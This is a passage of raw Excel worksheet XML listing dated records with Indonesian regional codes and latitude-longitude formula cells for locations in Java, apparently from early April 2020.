      <c r="I2035" t="s">
        <v>1263</v>
      </c>
      <c r="J2035" t="s">
        <v>2608</v>
      </c>
      <c r="L2035" t="s">
        <v>6804</v>
      </c>
      <c r="M2035">
        <v>3327010005</v>
      </c>
      <c r="N2035">
        <v>3327010</v>
      </c>
      <c r="O2035">
        <v>3327</v>
      </c>
      <c r="P2035">
        <v>33</v>
      </c>
      <c r="Q2035" t="s">
        <v>6805</v>
      </c>
      <c r="R2035" t="s">
        <v>6806</v>
      </c>
      <c r="S2035" t="s">
        <v>6807</v>
      </c>
      <c r="T2035" t="s">
        <v>1134</v>
      </c>
      <c r="U2035" s="5">
        <v>10924798</v>
      </c>
      <c r="V2035" s="5" t="s">
        <v>16262</v>
      </c>
      <c r="W2035" s="5">
        <v>-712885</v>
      </c>
      <c r="X2035" t="s">
        <v>20017</v>
      </c>
      <c r="Y2035" t="str">
        <f t="shared" si="31"/>
        <v>-7.12885,109.24798</v>
      </c>
    </row>
    <row r="2036" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2036">
        <v>180192</v>
      </c>
      <c r="B2036" s="1">
        <v>43923</v>
      </c>
      <c r="C2036">
        <v>0</v>
      </c>
      <c r="D2036" t="s">
        <v>22</v>
      </c>
      <c r="E2036" t="s">
        <v>23</v>
      </c>
      <c r="F2036" t="s">
        <v>6808</v>
      </c>
      <c r="H2036" t="s">
        <v>26</v>
      </c>
      <c r="I2036" t="s">
        <v>3577</v>
      </c>
      <c r="J2036" t="s">
        <v>6809</v>
      </c>
      <c r="L2036" t="s">
        <v>6810</v>
      </c>
      <c r="M2036">
        <v>3174030005</v>
      </c>
      <c r="N2036">
        <v>3174030</v>
      </c>
      <c r="O2036">
        <v>3174</v>
      </c>
      <c r="P2036">
        <v>31</v>
      </c>
      <c r="Q2036" t="s">
        <v>6811</v>
      </c>
      <c r="R2036" t="s">
        <v>1487</v>
      </c>
      <c r="S2036" t="s">
        <v>32</v>
      </c>
      <c r="T2036" t="s">
        <v>33</v>
      </c>
      <c r="U2036" s="5">
        <v>10680713</v>
      </c>
      <c r="V2036" s="5" t="s">
        <v>16263</v>
      </c>
      <c r="W2036" s="5">
        <v>-618842</v>
      </c>
      <c r="X2036" t="s">
        <v>20018</v>
      </c>
      <c r="Y2036" t="str">
        <f t="shared" si="31"/>
        <v>-6.18842,106.80713</v>
      </c>
    </row>
    <row r="2037" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2037">
        <v>180193</v>
      </c>
      <c r="B2037" s="1">
        <v>43923</v>
      </c>
      <c r="C2037">
        <v>1</v>
      </c>
      <c r="D2037" t="s">
        <v>85</v>
      </c>
      <c r="E2037" t="s">
        <v>23</v>
      </c>
      <c r="F2037" t="s">
        <v>6812</v>
      </c>
      <c r="G2037" t="s">
        <v>6813</v>
      </c>
      <c r="H2037" t="s">
        <v>26</v>
      </c>
      <c r="J2037" t="s">
        <v>2627</v>
      </c>
      <c r="K2037" t="s">
        <v>6814</v>
      </c>
      <c r="L2037" t="s">
        <v>6815</v>
      </c>
      <c r="M2037">
        <v>3211010009</v>
      </c>
      <c r="N2037">
        <v>3211010</v>
      </c>
      <c r="O2037">
        <v>3211</v>
      </c>
      <c r="P2037">
        <v>32</v>
      </c>
      <c r="Q2037" t="s">
        <v>2951</v>
      </c>
      <c r="R2037" t="s">
        <v>2952</v>
      </c>
      <c r="S2037" t="s">
        <v>1797</v>
      </c>
      <c r="T2037" t="s">
        <v>42</v>
      </c>
      <c r="U2037" s="5">
        <v>10777668</v>
      </c>
      <c r="V2037" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W2037" s="5">
        <v>-694316</v>
      </c>
      <c r="X2037" t="s">
        <v>20019</v>
      </c>
      <c r="Y2037" t="str">
        <f t="shared" si="31"/>
        <v>-6.94316,107.77668</v>
      </c>
    </row>
    <row r="2038" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2038">
        <v>180194</v>
      </c>
      <c r="B2038" s="1">
        <v>43923</v>
      </c>
      <c r="C2038">
        <v>1</v>
      </c>
      <c r="D2038" t="s">
        <v>22</v>
      </c>
      <c r="E2038" t="s">
        <v>23</v>
      </c>
      <c r="F2038" t="s">
        <v>6816</v>
      </c>
      <c r="G2038" t="s">
        <v>6817</v>
      </c>
      <c r="H2038" t="s">
        <v>26</v>
      </c>
      <c r="I2038" t="s">
        <v>487</v>
      </c>
      <c r="J2038" t="s">
        <v>2627</v>
      </c>
      <c r="L2038" t="s">
        <v>6818</v>
      </c>
      <c r="M2038">
        <v>3204270004</v>
      </c>
      <c r="N2038">
        <v>3204270</v>
      </c>
      <c r="O2038">
        <v>3204</v>
      </c>
      <c r="P2038">
        <v>32</v>
      </c>
      <c r="Q2038" t="s">
        <v>1785</v>
      </c>
      <c r="R2038" t="s">
        <v>1785</v>
      </c>
      <c r="S2038" t="s">
        <v>1464</v>
      </c>
      <c r="T2038" t="s">
        <v>42</v>
      </c>
      <c r="U2038" s="5">
        <v>10762216</v>
      </c>
      <c r="V2038" s="5" t="s">
        <v>16264</v>
      </c>
      <c r="W2038" s="5">
        <v>-698682</v>
      </c>
      <c r="X2038" t="s">
        <v>20020</v>
      </c>
      <c r="Y2038" t="str">
        <f t="shared" si="31"/>
        <v>-6.98682,107.62216</v>
      </c>
    </row>
    <row r="2039" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2039">
        <v>180195</v>
      </c>
      <c r="B2039" s="1">
        <v>43924</v>
      </c>
      <c r="C2039">
        <v>1</v>
      </c>
      <c r="D2039" t="s">
        <v>22</v>
      </c>
      <c r="E2039" t="s">
        <v>23</v>
      </c>
      <c r="F2039" t="s">
        <v>6819</v>
      </c>
      <c r="G2039" t="s">
        <v>6820</v>
      </c>
      <c r="H2039" t="s">
        <v>26</v>
      </c>
      <c r="I2039" t="s">
        <v>111</v>
      </c>
      <c r="J2039" t="s">
        <v>2627</v>
      </c>
      <c r="L2039" t="s">
        <v>6821</v>
      </c>
      <c r="M2039">
        <v>3204280006</v>
      </c>
      <c r="N2039">
        <v>3204280</v>
      </c>
      <c r="O2039">
        <v>3204</v>
      </c>
      <c r="P2039">
        <v>32</v>
      </c>
      <c r="Q2039" t="s">
        <v>1806</v>
      </c>
      <c r="R2039" t="s">
        <v>1807</v>
      </c>
      <c r="S2039" t="s">
        <v>1464</v>
      </c>
      <c r="T2039" t="s">
        <v>42</v>
      </c>
      <c r="U2039" s="5">
        <v>10770629</v>
      </c>
      <c r="V2039" s="5" t="s">
        <v>16265</v>
      </c>
      <c r="W2039" s="5">
        <v>-697167</v>
      </c>
      <c r="X2039" t="s">
        <v>18633</v>
      </c>
      <c r="Y2039" t="str">
        <f t="shared" si="31"/>
        <v>-6.97167,107.70629</v>
      </c>
    </row>
    <row r="2040" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2040">
        <v>180196</v>
      </c>
      <c r="B2040" s="1">
        <v>43924</v>
      </c>
      <c r="C2040">
        <v>1</v>
      </c>
      <c r="D2040" t="s">
        <v>2648</v>
      </c>
      <c r="E2040" t="s">
        <v>23</v>
      </c>
      <c r="G2040" t="s">
        <v>6822</v>
      </c>
      <c r="H2040" t="s">
        <v>26</v>
      </c>
      <c r="J2040" t="s">
        <v>6823</v>
      </c>
      <c r="L2040" t="s">
        <v>6824</v>
      </c>
      <c r="M2040">
        <v>3172080005</v>
      </c>
      <c r="N2040">
        <v>3172080</v>
      </c>
      <c r="O2040">
        <v>3172</v>
      </c>
      <c r="P2040">
        <v>31</v>
      </c>
      <c r="Q2040" t="s">
        <v>140</v>
      </c>
      <c r="R2040" t="s">
        <v>141</v>
      </c>
      <c r="S2040" t="s">
        <v>49</v>
      </c>
      <c r="T2040" t="s">
        <v>33</v>
      </c>
      <c r="U2040" s="5">
        <v>10695325</v>
      </c>
      <c r="V2040" s="5" t="s">
        <v>16266</v>
      </c>
      <c r="W2040" s="5">
        <v>-615832</v>
      </c>
      <c r="X2040" t="s">
        <v>20021</v>
      </c>
      <c r="Y2040" t="str">
        <f t="shared" si="31"/>
        <v>-6.15832,106.95325</v>
      </c>
    </row>
    <row r="2041" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2041">
        <v>180214</v>
      </c>
      <c r="B2041" s="1">
        <v>43925</v>
      </c>
      <c r="C2041">
        <v>0</v>
      </c>
      <c r="D2041" t="s">
        <v>85</v>
      </c>
      <c r="E2041" t="s">
        <v>23</v>
      </c>
      <c r="F2041" t="s">
        <v>6825</v>
      </c>
      <c r="G2041" t="s">
        <v>6826</v>
      </c>
      <c r="H2041" t="s">
        <v>26</v>
      </c>
      <c r="J2041" t="s">
        <v>2627</v>
      </c>
      <c r="K2041" t="s">
        <v>6827</v>
      </c>
      <c r="L2041" t="s">
        <v>6828</v>
      </c>
      <c r="M2041">
        <v>3211010009</v>
      </c>
      <c r="N2041">
        <v>3211010</v>
      </c>
      <c r="O2041">
        <v>3211</v>
      </c>
      <c r="P2041">
        <v>32</v>
      </c>
      <c r="Q2041" t="s">
        <v>2951</v>
      </c>
      <c r="R2041" t="s">
        <v>2952</v>
      </c>
      <c r="S2041" t="s">
        <v>1797</v>
      </c>
      <c r="T2041" t="s">
        <v>42</v>
      </c>
      <c r="U2041" s="5">
        <v>10777668</v>
      </c>
      <c r="V2041" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W2041" s="5">
        <v>-694318</v>
      </c>
      <c r="X2041" t="s">
        <v>20022</v>
      </c>
      <c r="Y2041" t="str">
        <f t="shared" si="31"/>
        <v>-6.94318,107.77668</v>
      </c>
    </row>
    <row r="2042" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2042">
        <v>180215</v>
      </c>
      <c r="B2042" s="1">
        <v>43925</v>
      </c>
      <c r="C2042">
        <v>0</v>
      </c>
      <c r="D2042" t="s">
        <v>22</v>
      </c>
      <c r="E2042" t="s">
        <v>23</v>
      </c>
      <c r="F2042" t="s">
        <v>6829</v>
      </c>
      <c r="H2042" t="s">
        <v>26</v>
      </c>
      <c r="I2042" t="s">
        <v>166</v>
      </c>
      <c r="J2042" t="s">
        <v>2627</v>
      </c>
      <c r="L2042" t="s">
        <v>6830</v>
      </c>
      <c r="M2042">
        <v>3204280006</v>
      </c>
      <c r="N2042">
        <v>3204280</v>
      </c>
      <c r="O2042">
        <v>3204</v>
      </c>
      <c r="P2042">
        <v>32</v>
      </c>
      <c r="Q2042" t="s">
        <v>1806</v>
      </c>
      <c r="R2042" t="s">
        <v>1807</v>
      </c>
      <c r="S2042" t="s">
        <v>1464</v>
      </c>
      <c r="T2042" t="s">
        <v>42</v>
      </c>
      <c r="U2042" s="5">
        <v>10768973</v>
      </c>
      <c r="V2042" s="5" t="s">
        <v>16267</v>
      </c>
      <c r="W2042" s="5">
        <v>-698399</v>
      </c>
      <c r="X2042" t="s">
        <v>20023</v>
      </c>
      <c r="Y2042" t="str">
        <f t="shared" si="31"/>
        <v>-6.98399,107.68973</v>
      </c>
    </row>
    <row r="2043" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2043">
        <v>180216</v>
      </c>
      <c r="B2043" s="1">
        <v>43926</v>
      </c>
      <c r="C2043">
        <v>0</v>
      </c>
      <c r="D2043" t="s">
        <v>2648</v>
      </c>
      <c r="E2043" t="s">
        <v>23</v>
      </c>
      <c r="G2043" t="s">
        <v>6831</v>
      </c>
      <c r="H2043" t="s">
        <v>26</v>
      </c>
      <c r="J2043" t="s">
        <v>2860</v>
      </c>
      <c r="L2043" t="s">
        <v>6832</v>
      </c>
      <c r="M2043">
        <v>3174080001</v>
      </c>
      <c r="N2043">
        <v>3174080</v>
      </c>
      <c r="O2043">
        <v>3174</v>
      </c>
      <c r="P2043">
        <v>31</v>
      </c>
      <c r="Q2043" t="s">
        <v>694</v>
      </c>
      <c r="R2043" t="s">
        <v>695</v>
      </c>
      <c r="S2043" t="s">
        <v>32</v>
      </c>
      <c r="T2043" t="s">
        <v>33</v>
      </c>
      <c r="U2043" s="5">
        <v>10669855</v>
      </c>
      <c r="V2043" s="5" t="s">
        <v>16268</v>
      </c>
      <c r="W2043" s="5">
        <v>-617281</v>
      </c>
      <c r="X2043" t="s">
        <v>20024</v>
      </c>
      <c r="Y2043" t="str">
        <f t="shared" si="31"/>
        <v>-6.17281,106.69855</v>
      </c>
    </row>
    <row r="2044" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2044">
        <v>180226</v>
      </c>
      <c r="B2044" s="1">
        <v>43926</v>
      </c>
      <c r="C2044">
        <v>1</v>
      </c>
      <c r="D2044" t="s">
        <v>22</v>
      </c>
      <c r="E2044" t="s">
        <v>23</v>
      </c>
      <c r="F2044" t="s">
        <v>6833</v>
      </c>
      <c r="H2044" t="s">
        <v>26</v>
      </c>
      <c r="I2044" t="s">
        <v>137</v>
      </c>
      <c r="J2044" t="s">
        <v>2627</v>
      </c>
      <c r="L2044" t="s">
        <v>6834</v>
      </c>
      <c r="M2044">
        <v>3204140003</v>
      </c>
      <c r="N2044">
        <v>3204140</v>
      </c>
      <c r="O2044">
        <v>3204</v>
      </c>
      <c r="P2044">
        <v>32</v>
      </c>
      <c r="Q2044" t="s">
        <v>1732</v>
      </c>
      <c r="R2044" t="s">
        <v>1732</v>
      </c>
      <c r="S2044" t="s">
        <v>1464</v>
      </c>
      <c r="T2044" t="s">
        <v>42</v>
      </c>
      <c r="U2044" s="5">
        <v>10763106</v>
      </c>
      <c r="V2044" s="5" t="s">
        <v>16269</v>
      </c>
      <c r="W2044" s="5">
        <v>-699417</v>
      </c>
      <c r="X2044" t="s">
        <v>20025</v>
      </c>
      <c r="Y2044" t="str">
        <f t="shared" si="31"/>
        <v>-6.99417,107.63106</v>
      </c>
    </row>
    <row r="2045" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2045">
        <v>180227</v>
      </c>
      <c r="B2045" s="1">
        <v>43927</v>
      </c>
      <c r="C2045">
        <v>0</v>
      </c>
      <c r="D2045" t="s">
        <v>2648</v>
      </c>
      <c r="E2045" t="s">
        <v>23</v>
      </c>
      <c r="G2045" t="s">
        <v>6835</v>
      </c>
      <c r="H2045" t="s">
        <v>26</v>
      </c>
      <c r="J2045" t="s">
        <v>6836</v>
      </c>
      <c r="L2045" t="s">
        <v>6837</v>
      </c>
      <c r="M2045">
        <v>3172070005</v>
      </c>
      <c r="N2045">
        <v>3172070</v>
      </c>
      <c r="O2045">
        <v>3172</v>
      </c>
      <c r="P2045">
        <v>31</v>
      </c>
      <c r="Q2045" t="s">
        <v>6838</v>
      </c>
      <c r="R2045" t="s">
        <v>128</v>
      </c>
      <c r="S2045" t="s">
        <v>49</v>
      </c>
      <c r="T2045" t="s">
        <v>33</v>
      </c>
      <c r="U2045" s="5">
        <v>10693340</v>
      </c>
      <c r="V2045" s="5" t="s">
        <v>16270</v>
      </c>
      <c r="W2045" s="5">
        <v>-622245</v>
      </c>
      <c r="X2045" t="s">
        <v>20026</v>
      </c>
      <c r="Y2045" t="str">
        <f t="shared" si="31"/>
        <v>-6.22245,106.93340</v>
      </c>
    </row>
    <row r="2046" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2046">
        <v>180233</v>
      </c>
      <c r="B2046" s="1">
        <v>43927</v>
      </c>
      <c r="C2046">
        <v>1</v>
      </c>
      <c r="D2046" t="s">
        <v>85</v>
      </c>
      <c r="E2046" t="s">
        <v>23</v>
      </c>
      <c r="F2046" t="s">
        <v>6839</v>
      </c>
      <c r="G2046" t="s">
        <v>6840</v>
      </c>
      <c r="H2046" t="s">
        <v>26</v>
      </c>
      <c r="J2046" t="s">
        <v>260</v>
      </c>
      <c r="K2046" t="s">
        <v>6841</v>
      </c>
      <c r="L2046" t="s">
        <v>6842</v>
      </c>
      <c r="M2046">
        <v>3171010003</v>
      </c>
      <c r="N2046">
        <v>3171010</v>
      </c>
      <c r="O2046">
        <v>3171</v>
      </c>
      <c r="P2046">
        <v>31</v>
      </c>
      <c r="Q2046" t="s">
        <v>263</v>
      </c>
      <c r="R2046" t="s">
        <v>264</v>
      </c>
      <c r="S2046" t="s">
        <v>108</v>
      </c>
      <c r="T2046" t="s">
        <v>33</v>
      </c>
      <c r="U2046" s="5">
        <v>10680232</v>
      </c>
      <c r="V2046" s="5" t="s">
        <v>16271</v>
      </c>
      <c r="W2046" s="5">
        <v>-634124</v>
      </c>
      <c r="X2046" t="s">
        <v>20027</v>
      </c>
      <c r="Y2046" t="str">
        <f t="shared" si="31"/>
        <v>-6.34124,106.80232</v>
      </c>
    </row>
    <row r="2047" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2047">
        <v>180234</v>
      </c>
      <c r="B2047" s="1">
        <v>43927</v>
      </c>
      <c r="C2047">
        <v>1</v>
      </c>
      <c r="D2047" t="s">
        <v>85</v>
      </c>
      <c r="E2047" t="s">
        <v>23</v>
      </c>
      <c r="F2047" t="s">
        <v>6843</v>
      </c>
      <c r="G2047" t="s">
        <v>6844</v>
      </c>
      <c r="H2047" t="s">
        <v>26</v>
      </c>
      <c r="J2047" t="s">
        <v>260</v>
      </c>
      <c r="K2047" t="s">
        <v>6845</v>
      </c>
      <c r="L2047" t="s">
        <v>6846</v>
      </c>
      <c r="M2047">
        <v>3171010003</v>
      </c>
      <c r="N2047">
        <v>3171010</v>
      </c>
      <c r="O2047">
        <v>3171</v>
      </c>
      <c r="P2047">
        <v>31</v>
      </c>
      <c r="Q2047" t="s">
        <v>263</v>
      </c>
      <c r="R2047" t="s">
        <v>264</v>
      </c>
      <c r="S2047" t="s">
        <v>108</v>
      </c>
      <c r="T2047" t="s">
        <v>33</v>
      </c>
      <c r="U2047" s="5">
        <v>10680232</v>
      </c>
      <c r="V2047" s="5" t="s">
        <v>16271</v>
      </c>
      <c r="W2047" s="5">
        <v>-634124</v>
      </c>
      <c r="X2047" t="s">
        <v>20027</v>
      </c>
      <c r="Y2047" t="str">
        <f t="shared" si="31"/>
        <v>-6.34124,106.80232</v>
      </c>
    </row>
    <row r="2048" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2048">
        <v>180235</v>
      </c>
      <c r="B2048" s="1">
        <v>43927</v>
      </c>
      <c r="C2048">
        <v>0</v>
      </c>
      <c r="D2048" t="s">
        <v>2648</v>
      </c>
      <c r="E2048" t="s">
        <v>23</v>
      </c>
      <c r="G2048" t="s">
        <v>6847</v>
      </c>
      <c r="H2048" t="s">
        <v>26</v>
      </c>
      <c r="J2048" t="s">
        <v>530</v>
      </c>
      <c r="L2048" t="s">
        <v>6848</v>
      </c>
      <c r="M2048">
        <v>3174020006</v>
      </c>
      <c r="N2048">
        <v>3174020</v>
      </c>
      <c r="O2048">
        <v>3174</v>
      </c>
      <c r="P2048">
        <v>31</v>
      </c>
      <c r="Q2048" t="s">
        <v>427</v>
      </c>
      <c r="R2048" t="s">
        <v>31</v>
      </c>
      <c r="S2048" t="s">
        <v>32</v>
      </c>
      <c r="T2048" t="s">
        <v>33</v>
      </c>
      <c r="U2048" s="5">
        <v>10675726</v>
      </c>
      <c r="V2048" s="5" t="s">
        <v>16272</v>
      </c>
      <c r="W2048" s="5">
        <v>-618664</v>
      </c>
      <c r="X2048" t="s">
        <v>20028</v>
      </c>
      <c r="Y2048" t="str">
        <f t="shared" si="31"/>
        <v>-6.18664,106.75726</v>
      </c>
    </row>
    <row r="2049" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2049">
        <v>180240</v>
      </c>
      <c r="B2049" s="1">
        <v>43927</v>
      </c>
      <c r="C2049">
        <v>0</v>
      </c>
      <c r="D2049" t="s">
        <v>2648</v>
      </c>
      <c r="E2049" t="s">
        <v>23</v>
      </c>
      <c r="G2049" t="s">
        <v>6849</v>
      </c>
      <c r="H2049" t="s">
        <v>26</v>
      </c>
      <c r="J2049" t="s">
        <v>2580</v>
      </c>
      <c r="L2049" t="s">
        <v>6850</v>
      </c>
      <c r="M2049">
        <v>3172040005</v>
      </c>
      <c r="N2049">
        <v>3172040</v>
      </c>
      <c r="O2049">
        <v>3172</v>
      </c>
      <c r="P2049">
        <v>31</v>
      </c>
      <c r="Q2049" t="s">
        <v>1351</v>
      </c>
      <c r="R2049" t="s">
        <v>281</v>
      </c>
      <c r="S2049" t="s">
        <v>49</v>
      </c>
      <c r="T2049" t="s">
        <v>33</v>
      </c>
      <c r="U2049" s="5">
        <v>10689378</v>
      </c>
      <c r="V2049" s="5" t="s">
        <v>16273</v>
      </c>
      <c r="W2049" s="5">
        <v>-624109</v>
      </c>
      <c r="X2049" t="s">
        <v>19965</v>
      </c>
      <c r="Y2049" t="str">
        <f t="shared" si="31"/>
        <v>-6.24109,106.89378</v>
      </c>
    </row>
    <row r="2050" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2050">
        <v>180274</v>
      </c>
      <c r="B2050" s="1">
        <v>43927</v>
      </c>
      <c r="C2050">
        <v>0</v>
      </c>
      <c r="D2050" t="s">
        <v>2648</v>
      </c>
      <c r="E2050" t="s">
        <v>23</v>
      </c>
      <c r="G2050" t="s">
        <v>6851</v>
      </c>
      <c r="H2050" t="s">
        <v>26</v>
      </c>
      <c r="J2050" t="s">
        <v>2802</v>
      </c>
      <c r="L2050" t="s">
        <v>6852</v>
      </c>
      <c r="M2050">
        <v>3172080002</v>
      </c>
      <c r="N2050">
        <v>3172080</v>
      </c>
      <c r="O2050">
        <v>3172</v>
      </c>
      <c r="P2050">
        <v>31</v>
      </c>
      <c r="Q2050" t="s">
        <v>2804</v>
      </c>
      <c r="R2050" t="s">
        <v>141</v>
      </c>
      <c r="S2050" t="s">
        <v>49</v>
      </c>
      <c r="T2050" t="s">
        <v>33</v>
      </c>
      <c r="U2050" s="5">
        <v>10693478</v>
      </c>
      <c r="V2050" s="5" t="s">
        <v>15080</v>
      </c>
      <c r="W2050" s="5">
        <v>-619156</v>
      </c>
      <c r="X2050" t="s">
        <v>20029</v>
      </c>
      <c r="Y2050" t="str">
        <f t="shared" si="31"/>
        <v>-6.19156,106.93478</v>
      </c>
    </row>
    <row r="2051" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2051">
        <v>180283</v>
      </c>
      <c r="B2051" s="1">
        <v>43927</v>
      </c>
      <c r="C2051">
        <v>0</v>
      </c>
      <c r="D2051" t="s">
        <v>85</v>
      </c>
      <c r="E2051" t="s">
        <v>23</v>
      </c>
      <c r="F2051" t="s">
        <v>6853</v>
      </c>
      <c r="G2051" t="s">
        <v>6854</v>
      </c>
      <c r="H2051" t="s">
        <v>26</v>
      </c>
      <c r="J2051" t="s">
        <v>6855</v>
      </c>
      <c r="K2051" t="s">
        <v>6856</v>
      </c>
      <c r="L2051" t="s">
        <v>6857</v>
      </c>
      <c r="M2051">
        <v>3275061003</v>
      </c>
      <c r="N2051">
        <v>3275061</v>
      </c>
      <c r="O2051">
        <v>3275</v>
      </c>
      <c r="P2051">
        <v>32</v>
      </c>
      <c r="Q2051" t="s">
        <v>40</v>
      </c>
      <c r="R2051" t="s">
        <v>40</v>
      </c>
      <c r="S2051" t="s">
        <v>41</v>
      </c>
      <c r="T2051" t="s">
        <v>42</v>
      </c>
      <c r="U2051" s="5">
        <v>10697060</v>
      </c>
      <c r="V2051" s="5" t="s">
        <v>16274</v>
      </c>
      <c r="W2051" s="5">
        <v>-619167</v>
      </c>
      <c r="X2051" t="s">
        <v>20030</v>
      </c>
      <c r="Y2051" t="str">
        <f t="shared" ref="Y2051:Y2114" si="32">CONCATENATE(X2051,",",V2051)</f>
        <v>-6.19167,106.97060</v>
      </c>
    </row>
    <row r="2052" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2052">
        <v>180287</v>
      </c>
      <c r="B2052" s="1">
        <v>43927</v>
      </c>
      <c r="C2052">
        <v>1</v>
      </c>
      <c r="D2052" t="s">
        <v>22</v>
      </c>
      <c r="E2052" t="s">
        <v>23</v>
      </c>
      <c r="F2052" t="s">
        <v>6858</v>
      </c>
      <c r="G2052" t="s">
        <v>6859</v>
      </c>
      <c r="H2052" t="s">
        <v>26</v>
      </c>
      <c r="I2052" t="s">
        <v>511</v>
      </c>
      <c r="J2052" t="s">
        <v>28</v>
      </c>
      <c r="L2052" t="s">
        <v>6860</v>
      </c>
      <c r="M2052">
        <v>3174020005</v>
      </c>
      <c r="N2052">
        <v>3174020</v>
      </c>
      <c r="O2052">
        <v>3174</v>
      </c>
      <c r="P2052">
        <v>31</v>
      </c>
      <c r="Q2052" t="s">
        <v>30</v>
      </c>
      <c r="R2052" t="s">
        <v>31</v>
      </c>
      <c r="S2052" t="s">
        <v>32</v>
      </c>
      <c r="T2052" t="s">
        <v>33</v>
      </c>
      <c r="U2052" s="5">
        <v>10676815</v>
      </c>
      <c r="V2052" s="5" t="s">
        <v>16275</v>
      </c>
      <c r="W2052" s="5">
        <v>-617311</v>
      </c>
      <c r="X2052" t="s">
        <v>20031</v>
      </c>
      <c r="Y2052" t="str">
        <f t="shared" si="32"/>
        <v>-6.17311,106.76815</v>
      </c>
    </row>
    <row r="2053" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2053">
        <v>181148</v>
      </c>
      <c r="B2053" s="1">
        <v>43930</v>
      </c>
      <c r="C2053">
        <v>0</v>
      </c>
      <c r="D2053" t="s">
        <v>22</v>
      </c>
      <c r="E2053" t="s">
        <v>23</v>
      </c>
      <c r="F2053" t="s">
        <v>6861</v>
      </c>
      <c r="G2053" t="s">
        <v>6862</v>
      </c>
      <c r="H2053" t="s">
        <v>26</v>
      </c>
      <c r="I2053" t="s">
        <v>271</v>
      </c>
      <c r="J2053" t="s">
        <v>2627</v>
      </c>
      <c r="L2053" t="s">
        <v>6863</v>
      </c>
      <c r="M2053">
        <v>3204170005</v>
      </c>
      <c r="N2053">
        <v>3204170</v>
      </c>
      <c r="O2053">
        <v>3204</v>
      </c>
      <c r="P2053">
        <v>32</v>
      </c>
      <c r="Q2053" t="s">
        <v>6864</v>
      </c>
      <c r="R2053" t="s">
        <v>6865</v>
      </c>
      <c r="S2053" t="s">
        <v>1464</v>
      </c>
      <c r="T2053" t="s">
        <v>42</v>
      </c>
      <c r="U2053" s="5">
        <v>10757857</v>
      </c>
      <c r="V2053" s="5" t="s">
        <v>16276</v>
      </c>
      <c r="W2053" s="5">
        <v>-703283</v>
      </c>
      <c r="X2053" t="s">
        <v>20032</v>
      </c>
      <c r="Y2053" t="str">
        <f t="shared" si="32"/>
        <v>-7.03283,107.57857</v>
      </c>
    </row>
    <row r="2054" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2054">
        <v>181149</v>
      </c>
      <c r="B2054" s="1">
        <v>43930</v>
      </c>
      <c r="C2054">
        <v>1</v>
      </c>
      <c r="D2054" t="s">
        <v>22</v>
      </c>
      <c r="E2054" t="s">
        <v>23</v>
      </c>
      <c r="F2054" t="s">
        <v>6866</v>
      </c>
      <c r="G2054" t="s">
        <v>6867</v>
      </c>
      <c r="H2054" t="s">
        <v>26</v>
      </c>
      <c r="I2054" t="s">
        <v>1099</v>
      </c>
      <c r="J2054" t="s">
        <v>2622</v>
      </c>
      <c r="L2054" t="s">
        <v>6868</v>
      </c>
      <c r="M2054">
        <v>3578080002</v>
      </c>
      <c r="N2054">
        <v>3578080</v>
      </c>
      <c r="O2054">
        <v>3578</v>
      </c>
      <c r="P2054">
        <v>35</v>
      </c>
      <c r="Q2054" t="s">
        <v>6869</v>
      </c>
      <c r="R2054" t="s">
        <v>3021</v>
      </c>
      <c r="S2054" t="s">
        <v>1346</v>
      </c>
      <c r="T2054" t="s">
        <v>1221</v>
      </c>
      <c r="U2054" s="5">
        <v>11277413</v>
      </c>
      <c r="V2054" s="5" t="s">
        <v>16277</v>
      </c>
      <c r="W2054" s="5">
        <v>-730365</v>
      </c>
      <c r="X2054" t="s">
        <v>20033</v>
      </c>
      <c r="Y2054" t="str">
        <f t="shared" si="32"/>
        <v>-7.30365,112.77413</v>
      </c>
    </row>
    <row r="2055" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2055">
        <v>181150</v>
      </c>
      <c r="B2055" s="1">
        <v>43930</v>
      </c>
      <c r="C2055">
        <v>1</v>
      </c>
      <c r="D2055" t="s">
        <v>22</v>
      </c>
      <c r="E2055" t="s">
        <v>23</v>
      </c>
      <c r="F2055" t="s">
        <v>6870</v>
      </c>
      <c r="G2055" t="s">
        <v>6871</v>
      </c>
      <c r="H2055" t="s">
        <v>26</v>
      </c>
      <c r="I2055" t="s">
        <v>3275</v>
      </c>
      <c r="J2055" t="s">
        <v>2627</v>
      </c>
      <c r="L2055" t="s">
        <v>6872</v>
      </c>
      <c r="M2055">
        <v>3204110006</v>
      </c>
      <c r="N2055">
        <v>3204110</v>
      </c>
      <c r="O2055">
        <v>3204</v>
      </c>
      <c r="P2055">
        <v>32</v>
      </c>
      <c r="Q2055" t="s">
        <v>2125</v>
      </c>
      <c r="R2055" t="s">
        <v>2126</v>
      </c>
      <c r="S2055" t="s">
        <v>1464</v>
      </c>
      <c r="T2055" t="s">
        <v>42</v>
      </c>
      <c r="U2055" s="5">
        <v>10777372</v>
      </c>
      <c r="V2055" s="5" t="s">
        <v>16278</v>
      </c>
      <c r="W2055" s="5">
        <v>-697656</v>
      </c>
      <c r="X2055" t="s">
        <v>20034</v>
      </c>
      <c r="Y2055" t="str">
        <f t="shared" si="32"/>
        <v>-6.97656,107.77372</v>
      </c>
    </row>
    <row r="2056" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2056">
        <v>181151</v>
      </c>
      <c r="B2056" s="1">
        <v>43931</v>
      </c>
      <c r="C2056">
        <v>0</v>
      </c>
      <c r="D2056" t="s">
        <v>2648</v>
      </c>
      <c r="E2056" t="s">
        <v>23</v>
      </c>
      <c r="G2056" t="s">
        <v>6873</v>
      </c>
      <c r="H2056" t="s">
        <v>26</v>
      </c>
